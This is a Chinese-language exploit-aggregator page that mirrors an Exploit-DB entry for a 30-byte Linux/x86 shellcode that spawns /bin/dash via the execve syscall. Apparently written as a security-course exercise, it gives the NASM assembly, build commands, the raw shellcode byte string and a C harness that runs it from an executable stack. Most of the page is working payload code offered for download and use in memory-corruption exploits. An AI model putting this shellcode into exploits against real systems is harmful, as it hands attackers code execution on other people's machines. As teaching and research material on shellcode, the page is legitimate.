漏洞概要

漏洞标题:
Linux/x86 – execve /bin/dash Shellcode (30 bytes)

提交时间:
2018-01-10

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 36 人关注

漏洞详情

EDB-ID: 43476 Author: Hashim Jawad Published: 2018-01-10
CVE: N/A Type: Shellcode Platform: Lin_x86

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Shellcode:

Download Shellcode Code Download

/

View Raw

Shellcode Size: 30 bytes
/*

################## Description ####################

; Title   : exec /bin/dash - Shellcode
; Author  : Hashim Jawad
; Website : ihack4falafel[.]com
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : spawn /bin/dash shell
; OS      : Linux
; Arch    : x86
; Size    : 30 bytes

################### dash.nasm #####################

global _start

section .text

_start:

        ; push NULL into the stack
        xor eax, eax
        push eax

        ; push (////bin/dash) into the stack

        push 0x68736164
        push 0x2f6e6962
        push 0x2f2f2f2f

        ; push ESP pointer to EBX
        mov ebx, esp

        ; execute  __NR_execve syscall
        push eax
        mov edx, esp
        push ebx
        mov ecx, esp
        mov al, 0xb
        int 0x80

################### dash binary #####################

nasm -f elf32 -o dash.o dash.nasm

ld -z execstack -o dash dash.o

################### Shellcode ########################

objdump -d dash -M intel

##################  Compile  #########################

gcc -fno-stack-protector -z execstack dash.c -o dash

*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";


main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

发表评论

电子邮件地址不会被公开。 必填项已用*标注